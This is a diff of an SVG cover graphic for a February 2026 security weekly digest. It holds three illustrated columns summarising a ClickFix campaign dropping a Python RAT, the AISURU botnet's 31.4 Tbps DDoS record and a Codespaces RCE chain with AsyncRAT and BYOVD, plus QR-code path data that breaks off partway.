+    <text x="20" y="80" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="500" fill="#BFC9D9">ClickFix variant targets enterprise</text>
   </g>
-  <!-- Node: SEC OPS -->
-  <circle cx="170" cy="340" r="22" fill="#1a0505" stroke="#ef4444" stroke-width="2"/>
-  <text x="170" y="344" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#ef4444" text-anchor="middle">SEC</text>
-  <!-- Node: CLOUD SEC -->
-  <circle cx="370" cy="350" r="20" fill="#1a0d0d" stroke="#f59e0b" stroke-width="2"/>
-  <text x="370" y="354" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#f59e0b" text-anchor="middle">CLOU</text>
-  <!-- Node: THREAT INT -->
-  <circle cx="580" cy="330" r="22" fill="#0a1020" stroke="#3b82f6" stroke-width="2"/>
-  <text x="580" y="334" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#3b82f6" text-anchor="middle">THRE</text>
-  <!-- Node: AI AGENT -->
-  <circle cx="780" cy="355" r="18" fill="#071a10" stroke="#22c55e" stroke-width="2"/>
-  <text x="780" y="359" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#22c55e" text-anchor="middle">AI</text>
-  <!-- Node: PATCH MGT -->
-  <circle cx="980" cy="340" r="22" fill="#071a20" stroke="#22d3ee" stroke-width="2"/>
-  <text x="980" y="344" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#22d3ee" text-anchor="middle">PATC</text>
-  <line x1="192" y1="340" x2="350" y2="350" stroke="#ef4444" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="390" y1="350" x2="558" y2="330" stroke="#f59e0b" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="602" y1="330" x2="762" y2="355" stroke="#3b82f6" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="798" y1="355" x2="958" y2="340" stroke="#22c55e" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
+  <!-- Scene: terminal + payload drop -->
+  <g transform="translate(168,140)">
+    <g filter="url(#softShadow)">
+      <rect x="-52" y="-30" width="104" height="56" rx="5" fill="#0A1B2E" stroke="#3A86FF" stroke-width="1.6"/>
+      <circle cx="-40" cy="-18" r="3" fill="#E63946">
+        <animate attributeName="opacity" values="0.4;1;0.4" dur="1.4s" repeatCount="indefinite"/>
+      </circle>
+      <circle cx="-30" cy="-18" r="3" fill="#FFB703"/>
+      <circle cx="-20" cy="-18" r="3" fill="#22C55E"/>
+      <rect x="-44" y="-8" width="60" height="4" rx="1" fill="#3A86FF" opacity="0.5"/>
+      <rect x="-44" y="0" width="44" height="4" rx="1" fill="#8FB8FF" opacity="0.35"/>
+      <rect x="-44" y="8" width="50" height="4" rx="1" fill="#3A86FF" opacity="0.4"/>
+      <text x="0" y="32" text-anchor="middle" font-family="Inter, monospace" font-size="8" font-weight="800" fill="#8FB8FF">PYTHON RAT</text>
+    </g>
+    <g stroke="#3A86FF" stroke-width="1.2" fill="none">
+      <line x1="-20" y1="28" x2="-40" y2="52" stroke-dasharray="3 2">
+        <animate attributeName="stroke-opacity" values="0.3;1;0.3" dur="1.8s" repeatCount="indefinite"/>
+      </line>
+      <line x1="0" y1="28" x2="0" y2="52" stroke-dasharray="3 2">
+        <animate attributeName="stroke-opacity" values="0.3;1;0.3" dur="2.0s" begin="0.3s" repeatCount="indefinite"/>
+      </line>
+      <line x1="20" y1="28" x2="40" y2="52" stroke-dasharray="3 2">
+        <animate attributeName="stroke-opacity" values="0.3;1;0.3" dur="1.6s" begin="0.6s" repeatCount="indefinite"/>
+      </line>
+    </g>
+    <g>
+      <rect x="-48" y="52" width="16" height="14" rx="2" fill="#0A1B2E" stroke="#3A86FF" stroke-width="1"/>
+      <text x="-40" y="63" text-anchor="middle" font-family="Inter, monospace" font-size="6" font-weight="800" fill="#3A86FF">PC</text>
+      <rect x="-8" y="52" width="16" height="14" rx="2" fill="#0A1B2E" stroke="#3A86FF" stroke-width="1"/>
+      <text x="0" y="63" text-anchor="middle" font-family="Inter, monospace" font-size="6" font-weight="800" fill="#3A86FF">SRV</text>
+      <rect x="32" y="52" width="16" height="14" rx="2" fill="#0A1B2E" stroke="#3A86FF" stroke-width="1"/>
+      <text x="40" y="63" text-anchor="middle" font-family="Inter, monospace" font-size="6" font-weight="800" fill="#3A86FF">DB</text>
+    </g>
+  </g>
+  <!-- Attack chain -->
+  <g transform="translate(28,208)">
+    <g>
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#0A1B2E" stroke="#3A86FF" stroke-width="1.2"/>
+      <circle cx="18" cy="17" r="7" fill="#3A86FF"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#FFFFFF">1</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#F5F7FA">ClickFix lure + clipboard hijack</text>
+    </g>
+    <line x1="18" y1="38" x2="18" y2="50" stroke="#3A86FF" stroke-width="1.4" stroke-dasharray="2 2"/>
+    <g transform="translate(0,54)">
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#0A1B2E" stroke="#3A86FF" stroke-width="1.2"/>
+      <circle cx="18" cy="17" r="7" fill="#3A86FF"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#FFFFFF">2</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#F5F7FA">Python RAT drop via mshta</text>
+    </g>
+    <line x1="18" y1="92" x2="18" y2="104" stroke="#3A86FF" stroke-width="1.4" stroke-dasharray="2 2"/>
+    <g transform="translate(0,108)">
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#12283F" stroke="#8FB8FF" stroke-width="1.4"/>
+      <circle cx="18" cy="17" r="7" fill="#8FB8FF"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#0A1020">3</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="800" fill="#F5F7FA">C2 persistence + data theft</text>
+    </g>
+  </g>
+  <!-- KPI pill -->
+  <g transform="translate(28,348)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="280" height="32" rx="8" fill="#12283F" stroke="#3A86FF" stroke-width="1.6"/>
+    <text x="14" y="21" font-family="Inter, monospace" font-size="11" font-weight="700" fill="#8FB8FF">TYPE</text>
+    <text x="140" y="22" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="14" font-weight="900" fill="#F5F7FA">CrashFix RAT</text>
+    <text x="266" y="21" text-anchor="end" font-family="Inter, monospace" font-size="10" font-weight="700" fill="#8FB8FF">HIGH</text>
+  </g>
+</g>
 
-  <!-- Footer -->
-  <rect x="0" y="472" width="1200" height="158" fill="#080c18" opacity="0.95"/>
-  <rect x="0" y="472" width="1200" height="2" fill="#1e293b"/>
+<!-- COL B: AISURU 31.4 Tbps DDoS Botnet (Feb 05) -->
+<g transform="translate(432,216)">
+  <rect x="0" y="0" width="336" height="390" rx="14" fill="url(#colB)" stroke="#22C55E" stroke-width="1.6" opacity="0.97"/>
+  <rect x="0" y="0" width="336" height="4" fill="#22C55E" opacity="0.7"/>
+  <g filter="url(#textShadow)">
+    <text x="20" y="28" font-family="Inter, Helvetica, Arial, sans-serif" font-size="11" font-weight="700" fill="#22C55E" letter-spacing="2.4">CRITICAL  /  BOTNET</text>
+    <text x="20" y="56" font-family="Inter, Helvetica, Arial, sans-serif" font-size="22" font-weight="800" fill="#F5F7FA">AISURU DDoS Record</text>
+    <text x="20" y="80" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="500" fill="#86EFAC">31.4 Tbps world record attack</text>
+  </g>
+  <!-- Scene: globe + attack rays -->
+  <g transform="translate(168,140)">
+    <g filter="url(#softShadow)">
+      <circle cx="0" cy="0" r="30" fill="#0E2A14" stroke="#22C55E" stroke-width="2"/>
+      <ellipse cx="0" cy="0" rx="14" ry="30" fill="none" stroke="#22C55E" stroke-width="1" opacity="0.5"/>
+      <line x1="-30" y1="0" x2="30" y2="0" stroke="#22C55E" stroke-width="1" opacity="0.5"/>
+      <line x1="-30" y1="-10" x2="30" y2="-10" stroke="#22C55E" stroke-width="0.7" opacity="0.3"/>
+      <line x1="-30" y1="10" x2="30" y2="10" stroke="#22C55E" stroke-width="0.7" opacity="0.3"/>
+      <text x="0" y="5" text-anchor="middle" font-family="Inter, monospace" font-size="8" font-weight="800" fill="#86EFAC">GLOBAL</text>
+    </g>
+    <g stroke="#22C55E" stroke-width="1.4" fill="none">
+      <line x1="-60" y1="-40" x2="-32" y2="-18">
+        <animate attributeName="stroke-opacity" values="0.2;1;0.2" dur="1.4s" repeatCount="indefinite"/>
+      </line>
+      <line x1="-65" y1="0" x2="-32" y2="0">
+        <animate attributeName="stroke-opacity" values="0.2;1;0.2" dur="1.6s" begin="0.2s" repeatCount="indefinite"/>
+      </line>
+      <line x1="-60" y1="40" x2="-32" y2="18">
+        <animate attributeName="stroke-opacity" values="0.2;1;0.2" dur="1.5s" begin="0.4s" repeatCount="indefinite"/>
+      </line>
+      <line x1="60" y1="-40" x2="32" y2="-18">
+        <animate attributeName="stroke-opacity" values="0.2;1;0.2" dur="1.7s" begin="0.1s" repeatCount="indefinite"/>
+      </line>
+      <line x1="65" y1="0" x2="32" y2="0">
+        <animate attributeName="stroke-opacity" values="0.2;1;0.2" dur="1.3s" begin="0.5s" repeatCount="indefinite"/>
+      </line>
+      <line x1="60" y1="40" x2="32" y2="18">
+        <animate attributeName="stroke-opacity" values="0.2;1;0.2" dur="1.8s" begin="0.3s" repeatCount="indefinite"/>
+      </line>
+    </g>
+    <text x="0" y="50" text-anchor="middle" font-family="Inter, monospace" font-size="12" font-weight="900" fill="#22C55E">31.4 Tbps</text>
+  </g>
+  <!-- Attack chain -->
+  <g transform="translate(28,208)">
+    <g>
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#0E2A14" stroke="#22C55E" stroke-width="1.2"/>
+      <circle cx="18" cy="17" r="7" fill="#22C55E"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#0A1202">1</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#F5F7FA">AISURU/Kimwolf botnet compile</text>
+    </g>
+    <line x1="18" y1="38" x2="18" y2="50" stroke="#22C55E" stroke-width="1.4" stroke-dasharray="2 2"/>
+    <g transform="translate(0,54)">
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#0E2A14" stroke="#22C55E" stroke-width="1.2"/>
+      <circle cx="18" cy="17" r="7" fill="#22C55E"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#0A1202">2</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#F5F7FA">IoT device mass exploitation</text>
+    </g>
+    <line x1="18" y1="92" x2="18" y2="104" stroke="#22C55E" stroke-width="1.4" stroke-dasharray="2 2"/>
+    <g transform="translate(0,108)">
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#163A1C" stroke="#86EFAC" stroke-width="1.4"/>
+      <circle cx="18" cy="17" r="7" fill="#86EFAC"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#0A1202">3</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="800" fill="#F5F7FA">31.4 Tbps flood world record</text>
+    </g>
+  </g>
+  <!-- KPI pill -->
+  <g transform="translate(28,348)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="280" height="32" rx="8" fill="#163A1C" stroke="#22C55E" stroke-width="1.6"/>
+    <text x="14" y="21" font-family="Inter, monospace" font-size="11" font-weight="700" fill="#22C55E">PEAK</text>
+    <text x="140" y="22" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="16" font-weight="900" fill="#F5F7FA">31.4 Tbps</text>
+    <text x="266" y="21" text-anchor="end" font-family="Inter, monospace" font-size="10" font-weight="700" fill="#22C55E">RECORD</text>
+  </g>
+</g>
 
-  <!-- Tags -->
-  <rect x="32" y="490" width="83" height="24" rx="4" fill="#1a0505" stroke="#ef4444" stroke-width="1"/>
-  <text x="73" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#ef4444" text-anchor="middle">SEC OPS</text>
-  <rect x="127" y="490" width="101" height="24" rx="4" fill="#1a0d0d" stroke="#f59e0b" stroke-width="1"/>
-  <text x="177" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#f59e0b" text-anchor="middle">CLOUD SEC</text>
-  <rect x="240" y="490" width="110" height="24" rx="4" fill="#0a1020" stroke="#3b82f6" stroke-width="1"/>
-  <text x="295" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#3b82f6" text-anchor="middle">THREAT INT</text>
-  <rect x="362" y="490" width="92" height="24" rx="4" fill="#071a10" stroke="#22c55e" stroke-width="1"/>
-  <text x="408" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#22c55e" text-anchor="middle">AI AGENT</text>
-  <rect x="466" y="490" width="101" height="24" rx="4" fill="#071a20" stroke="#22d3ee" stroke-width="1"/>
-  <text x="516" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#22d3ee" text-anchor="middle">PATCH MGT</text>
+<!-- COL C: Codespaces RCE + AsyncRAT + BYOVD (Feb 06) -->
+<g transform="translate(792,216)">
+  <rect x="0" y="0" width="336" height="390" rx="14" fill="url(#colC)" stroke="#E63946" stroke-width="1.6" opacity="0.97"/>
+  <rect x="0" y="0" width="336" height="4" fill="#E63946" opacity="0.7"/>
+  <g filter="url(#textShadow)">
+    <text x="20" y="28" font-family="Inter, Helvetica, Arial, sans-serif" font-size="11" font-weight="700" fill="#F87171" letter-spacing="2.4">HIGH  /  CLOUD RCE</text>
+    <text x="20" y="56" font-family="Inter, Helvetica, Arial, sans-serif" font-size="22" font-weight="800" fill="#F5F7FA">Codespaces RCE+BYOVD</text>
+    <text x="20" y="80" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="500" fill="#FBB6BD">AsyncRAT C2 + driver abuse</text>
+  </g>
+  <!-- Scene: cloud with RCE exploit arrow + BYOVD badge -->
+  <g transform="translate(168,140)">
+    <g filter="url(#softShadow)">
+      <ellipse cx="0" cy="4" rx="38" ry="22" fill="#3A0F1A" stroke="#E63946" stroke-width="1.8"/>
+      <ellipse cx="-20" cy="-4" rx="18" ry="14" fill="#3A0F1A" stroke="#E63946" stroke-width="1.4"/>
+      <ellipse cx="20" cy="-4" rx="18" ry="14" fill="#3A0F1A" stroke="#E63946" stroke-width="1.4"/>
+      <ellipse cx="0" cy="-12" rx="14" ry="12" fill="#3A0F1A" stroke="#E63946" stroke-width="1.4"/>
+      <text x="0" y="8" text-anchor="middle" font-family="Inter, monospace" font-size="8" font-weight="800" fill="#FCA5A5">CODESPACE</text>
+    </g>
+    <g>
+      <line x1="-70" y1="30" x2="-40" y2="10" stroke="#E63946" stroke-width="2.2" stroke-linecap="round">
+        <animate attributeName="stroke-opacity" values="0.3;1;0.3" dur="1.5s" repeatCount="indefinite"/>
+      </line>
+      <polygon points="-40,10 -52,18 -48,6" fill="#E63946">
+        <animate attributeName="opacity" values="0.3;1;0.3" dur="1.5s" repeatCount="indefinite"/>
+      </polygon>
+      <text x="-66" y="46" font-family="Inter, monospace" font-size="7" font-weight="800" fill="#FCA5A5">RCE</text>
+    </g>
+    <g transform="translate(52,18)">
+      <rect x="-18" y="-10" width="36" height="20" rx="3" fill="#1E0A14" stroke="#FCA5A5" stroke-width="1.2"/>
+      <text x="0" y="4" text-anchor="middle" font-family="Inter, monospace" font-size="7" font-weight="800" fill="#FCA5A5">BYOVD</text>
+    </g>
+    <text x="0" y="50" text-anchor="middle" font-family="Inter, monospace" font-size="9" font-weight="800" fill="#FCA5A5">MULTI-VECTOR</text>
+  </g>
+  <!-- Attack chain -->
+  <g transform="translate(28,208)">
+    <g>
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#1E0A14" stroke="#E63946" stroke-width="1.2"/>
+      <circle cx="18" cy="17" r="7" fill="#E63946"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#FFFFFF">1</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#F5F7FA">Codespaces RCE initial access</text>
+    </g>
+    <line x1="18" y1="38" x2="18" y2="50" stroke="#E63946" stroke-width="1.4" stroke-dasharray="2 2"/>
+    <g transform="translate(0,54)">
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#1E0A14" stroke="#E63946" stroke-width="1.2"/>
+      <circle cx="18" cy="17" r="7" fill="#E63946"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#FFFFFF">2</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#F5F7FA">AsyncRAT C2 + BYOVD pivot</text>
+    </g>
+    <line x1="18" y1="92" x2="18" y2="104" stroke="#E63946" stroke-width="1.4" stroke-dasharray="2 2"/>
+    <g transform="translate(0,108)">
+      <rect x="0" y="0" width="280" height="34" rx="6" fill="#3A0F1A" stroke="#FCA5A5" stroke-width="1.4"/>
+      <circle cx="18" cy="17" r="7" fill="#FCA5A5"/>
+      <text x="18" y="21" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#1A0005">3</text>
+      <text x="36" y="22" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="800" fill="#F5F7FA">EDR bypass + lateral movement</text>
+    </g>
+  </g>
+  <!-- KPI pill -->
+  <g transform="translate(28,348)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="280" height="32" rx="8" fill="#3A0F1A" stroke="#E63946" stroke-width="1.6"/>
+    <text x="14" y="21" font-family="Inter, monospace" font-size="11" font-weight="700" fill="#F87171">CHAIN</text>
+    <text x="140" y="22" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="900" fill="#F5F7FA">RCE+RAT+BYOVD</text>
+    <text x="266" y="21" text-anchor="end" font-family="Inter, monospace" font-size="10" font-weight="700" fill="#F87171">HIGH</text>
+  </g>
+</g>
 
-  <!-- Bottom bar -->
-  <circle cx="32" cy="545" r="4" fill="#ef4444" opacity="0.6"/>
-  <text x="46" y="550" font-family="Arial,sans-serif" font-size="12" fill="#475569">Security Weekly Digest | February 06, 2026</text>
-  <text x="1168" y="550" font-family="Arial,sans-serif" font-size="12" fill="#475569" text-anchor="end">tech.2twodragon.com</text>
+<!-- Ambient spark dots along timeline (static) -->
+<g opacity="0.5">
+  <circle cx="320" cy="170" r="1.2" fill="#8FB8FF"/>
+  <circle cx="460" cy="170" r="1.2" fill="#8FB8FF"/>
+  <circle cx="680" cy="170" r="1.2" fill="#86EFAC"/>
+  <circle cx="810" cy="170" r="1.2" fill="#86EFAC"/>
+  <circle cx="1010" cy="170" r="1.2" fill="#FCA5A5"/>
+</g>
+
+<!-- QR placeholder -->
+<!-- cover-qr: https://tech.2twodragon.com/posts/2026/02/06/Tech_Security_Weekly_Digest_AI_Botnet_Cloud_Threat/ : 41x41 -->
+<g transform="translate(1080,504)" filter="url(#softShadow)">
+  <rect x="-8" y="-8" width="100" height="100" rx="6" fill="#FFFFFF"/>
+  <g transform="scale(2.048780)" fill="#0A1020">
+    <path d="M0 0h7v1h-7zM8 0h2v1h-2zM11 0h1v1h-1zM14 0h2v1h-2zM18 0h1v1h-1zM21 0h2v1h-2zM25 0h6v1h-6zM34 0h7v1h-7zM0 1h1v1h-1zM6 1h1v1h-1zM9 1h4v1h-4zM14 1h2v1h-2zM18 1h5v1h-5zM24 1h3v1h-3zM29 1h1v1h-1zM31 1h1v1h-1zM34 1h1v1h-1zM40 1h1v1h-1zM0 2h1v1h-1zM2 2h3v1h-3zM6 2h1v1h-1zM10 2h3v1h-3zM17 2h3v1h-3zM22 2h3v1h-3zM26 2h2v1h-2zM29 2h2v1h-2zM32 2h1v1h-1zM34 2h1v1h-1zM36 2h3v1h-3zM40 2h1v1h-1zM0 3h1v1h-1zM2 3h3v1h-3zM6 3h1v1h-1zM8 3h1v1h-1zM10 3h1v1h-1zM12 3h3v1h-3zM16 3h2v1h-2zM20 3h2v1h-2zM23 3h5v1h-5zM29 3h2v1h-2zM32 3h1v1h-1zM34 3h1v1h-1zM36 3h3v1h-3zM40 3h1v1h-1zM0 4h1v1h-1zM2 4h3v1h-3zM6 4h1v1h-1zM8 4h4v1h-4zM13 4h2v1h-2zM17 4h1v1h-1zM19 4h1v1h-1zM25 4h1v1h-1zM27 4h1v1h-1zM32 4h1v1h-1zM34 4h1v1h-1zM36 4h3v1h-3zM40 4h1v1h-1zM0 5h1v1h-1zM6 5h1v1h-1zM8 5h3v1h-3zM12 5h1v1h-1zM14 5h4v1h-4zM19 5h1v1h-1zM21 5h1v1h-1zM26 5h1v1h-1zM31 5h2v1h-2zM34 5h1v1h-1zM40 5h1v1h-1zM0 6h7v1h-7zM8 6h1v1h-1zM10 6h1v1h-1zM12 6h1v1h-1zM14 6h1v1h-1zM16 6h1v1h-1zM18 6h1v1h-1zM20 6h1v1h-1zM22 6h1v1h-1zM24 6h1v1h-1zM26 6h1v1h-1zM28 6h1v1h-1zM30 6h1v1h-1zM32 6h1v1h-1zM34 6h7v1h-7zM8 7h4v1h-4zM13 7h3v1h-3zM17 7h1v1h-1zM19 7h4v1h-4zM24 7h1v1h-1zM27 7h3v1h-3zM31 7h1v1h-1zM0 8h1v1h-1zM4 8h1v1h-1zM6 8h3v1h-3zM13 8h3v1h-3zM17 8h1v1h-1zM20 8h4v1h-4zM28 8h2v1h-2zM31 8h1v1h-1zM33 8h5v1h-5zM40 8h1v1h-1zM2 9h2v1h-2zM5 9h1v1h-1zM8 9h1v1h-1zM10 9h2v1h-2zM14 9h3v1h-3zM18 9h1v1h-1zM20 9h1v1h-1zM23 9h1v1h-1zM25 9h1v1h-1zM27 9h1v1h-1zM30 9h1v1h-1zM33 9h1v1h-1zM35 9h3v1h-3zM39 9h2v1h-2zM0 10h2v1h-2zM3 10h1v1h-1zM6 10h1v1h-1zM8 10h2v1h-2zM11 10h1v1h-1zM13 10h1v1h-1zM15 10h2v1h-2zM21 10h1v1h-1zM23 10h1v1h-1zM25 10h1v1h-1zM27 10h3v1h-3zM32 10h1v1h-1zM40 10h1v1h-1zM0 11h3v1h-3zM5 11h1v1h-1zM8 11h1v1h-1zM11 11h1v1h-1zM14 11h1v1h-1zM17 11h8v1h-8zM29 11h1v1h-1zM31 11h7v1h-7zM40 11h1v1h-1zM1 12h6v1h-6zM9 12h2v1h-2zM12 12h1v1h-1zM14 12h1v1h-1zM17 12h1v1h-1zM20 12h3v1h-3zM26 12h2v1h-2zM29 12h2v1h-2zM33 12h1v1h-1zM35 12h1v1h-1zM39 12h1v1h-1zM0 13h1v1h-1zM2 13h2v1h-2zM7 13h1v1h-1zM10 13h1v1h-1zM12 13h1v1h-1zM15 13h5v1h-5zM21 13h1v1h-1zM24 13h1v1h-1zM26 13h4v1h-4zM31 13h1v1h-1zM34 13h3v1h-3zM39 13h2v1h-2zM0 14h2v1h-2zM5 14h3v1h-3zM9 14h1v1h-1zM11 14h1v1h-1zM14 14h2v1h-2zM18 14h2v1h-2zM23 14h2v1h-2zM27 14h1v1h-1zM33 14h2v1h-2zM36 14h3v1h-3zM40 14h1v1h-1zM2 15h1v1h-1zM4 15h2v1h-2zM10 15h1v1h-1zM12 15h1v1h-1zM15 15h7v1h-7zM23 15h1v1h-1zM26 15h2v1h-2zM29 15h2v1h-2zM32 15h1v1h-1zM35 15h1v1h-1zM37 15h1v1h-1zM40 15h1v1h-1zM2 16h1v1h-1zM6 16h1v1h-1zM9 16h1v1h-1zM14 16h1v1h-1zM17 16h1v1h-1zM20 16h1v1h-1zM22 16h1v1h-1zM29 16h1v1h-1zM31 16h2v1h-2zM35 16h1v1h-1zM39 16h1v1h-1zM0 17h2v1h-2zM3 17h1v1h-1zM5 17h1v1h-1zM7 17h2v1h-2zM10 17h1v1h-1zM12 17h1v1h-1zM16 17h2v1h-2zM19 17h1v1h-1zM23 17h1v1h-1zM25 17h2v1h-2zM28 17h1v1h-1zM30 17h1v1h-1zM33 17h6v1h-6zM40 17h1v1h-1zM3 18h4v1h-4zM9 18h1v1h-1zM11 18h3v1h-3zM15 18h2v1h-2zM18 18h1v1h-1zM20 18h5v1h-5zM26 18h2v1h-2zM29 18h2v1h-2zM32 18h1v1h-1zM34 18h2v1h-2zM38 18h3v1h-3zM1 19h2v1h-2zM4 19h1v1h-1zM7 19h2v1h-2zM13 19h1v1h-1zM16 19h1v1h-1zM19 19h3v1h-3zM29 19h1v1h-1zM32 19h4v1h-4zM37 19h1v1h-1zM40 19h1v1h-1zM0 20h2v1h-2zM4 20h3v1h-3zM8 20h1v1h-1zM11 20h3v1h-3zM15 20h1v1h-1zM24 20h1v1h-1zM26 20h4v1h-4zM31 20h1v1h-1zM33 20h1v1h-1zM37 20h1v1h-1zM39 20h2v1h-2zM1 21h1v1h-1zM4 21h2v1h-2zM8 21h1v1h-1zM12 21h2v1h-2zM15 21h2v1h-2zM18 21h2v1h-2zM22 21h6v1h-6zM30 21h1v1h-1zM32 21h5v1h-5zM38 21h1v1h-1zM40 21h1v1h-1zM0 22h2v1h-2zM4 22h1v1h-1zM6 22h4v1h-4zM13 22h1v1h-1zM15 22h1v1h-1zM21 22h3v1h-3zM26 22h2v1h-2zM29 22h2v1h-2zM32 22h1v1h-1zM36 22h1v1h-1zM40 22h1v1h-1zM1 23h1v1h-1zM5 23h1v1h-1zM8 23h4v1h-4zM14 23h5v1h-5zM21 23h1v1h-1zM24 23h1v1h-1zM29 23h4v1h-4zM35 23h1v1h-1zM37 23h1v1h-1zM39 23h2v1h-2zM0 24h1v1h-1zM3 24h2v1h-2zM6 24h1v1h-1zM10 24h2v1h-2zM14 24h1v1h-1zM17 24h1v1h-1zM20 24h3v1h-3zM24 24h1v1h-1zM27 24h1v1h-1zM29 24h1v1h-1zM32 24h2v1h-2zM35 24h1v1h-1zM38 24h1v1h-1zM0 25h2v1h-2zM3 25h3v1h-3zM7 25h1v1h-1zM10 25h2v1h-2zM18 25h1v1h-1zM23 25h1v1h-1zM27 25h1v1h-1zM30 25h1v1h-1zM32 25h2v1h-2zM35 25h2v1h-2zM38 25h1v1h-1zM40 25h1v1h-1zM1 26h1v1h-1zM3 26h1v1h-1zM5 26h3v1h-3zM10 26h1v1h-1zM13 26h6v1h-6zM20 26h2v1h-2zM23 26h6v1h-6zM32 26h1v1h-1zM35 26h1v1h-1zM40 26h1v1h-1zM1 27h1v1h-1zM5 27h1v1h-1zM7 27h1v1h-1zM9 27h2v1h-2zM12 27h1v1h-1zM16 27h6v1h-6zM24 27h1v1h-1zM26 27h4v1h-4zM31 27h2v1h-2zM37 27h1v1h-1zM39 27h1v1h-1zM0 28h2v1h-2zM4 28h1v1h-1zM6 28h3v1h-3zM12 28h1v1h-1zM15 28h1v1h-1zM17 28h1v1h-1zM21 28h4v1h-4zM26 28h2v1h-2zM29 28h2v1h-2zM32 28h2v1h-2zM35 28h1v1h-1zM39 28h2v1h-2zM0 29h1v1h-1zM2 29h1v1h-1zM5 29h1v1h-1zM7 29h4v1h-4zM15 29h1v1h-1zM18 29h3v1h-3zM25 29h1v1h-1zM27 29h3v1h-3zM33 29h8v1h-8zM6 30h4v1h-4zM11 30h5v1h-5zM17 30h2v1h-2zM20 30h3v1h-3zM25 30h6v1h-6zM32 30h2v1h-2zM36 30h1v1h-1zM40 30h1v1h-1zM2 31h2v1h-2zM9 31h1v1h-1zM12 31h3v1h-3zM17 31h1v1h-1zM21 31h1v1h-1zM24 31h1v1h-1zM26 31h1v1h-1zM28 31h2v1h-2zM32 31h2v1h-2zM36 31h2v1h-2zM0 32h2v1h-2zM6 32h5v1h-5zM12 32h1v1h-1zM17 32h1v1h-1zM19 32h1v1h-1zM22 32h2v1h-2zM28 32h2v1h-2zM31 32h7v1h-7zM8 33h3v1h-3zM13 33h3v1h-3zM18 33h2v1h-2zM21 33h1v1h-1zM23 33h1v1h-1zM26 33h1v1h-1zM28 33h2v1h-2zM31 33h2v1h-2zM36 33h2v1h-2zM40 33h1v1h-1zM0 34h7v1h-7zM8 34h4v1h-4zM13 34h1v1h-1zM15 34h1v1h-1zM17 34h1v1h-1zM20 34h1v1h-1zM23 34h5v1h-5zM29 34h1v1h-1zM31 34h2v1h-2zM34 34h1v1h-1zM36 34h2v1h-2zM40 34h1v1h-1zM0 35h1v1h-1zM6 35h1v1h-1zM12 35h7v1h-7zM22 35h3v1h-3zM26 35h4v1h-4zM31 35h2v1h-2zM36 35h2v1h-2zM0 36h1v1h-1zM2 36h3v1h-3zM6 36h1v1h-1zM8 36h1v1h-1zM10 36h1v1h-1zM12 36h1v1h-1zM14 36h3v1h-3zM18 36h1v1h-1zM20 36h1v1h-1zM22 36h1v1h-1zM25 36h3v1h-3zM29 36h1v1h-1zM31 36h6v1h-6zM39 36h2v1h-2zM0 37h1v1h-1zM2 37h3v1h-3zM6 37h1v1h-1zM9 37h1v1h-1zM11 37h3v1h-3zM15 37h3v1h-3zM23 37h5v1h-5zM35 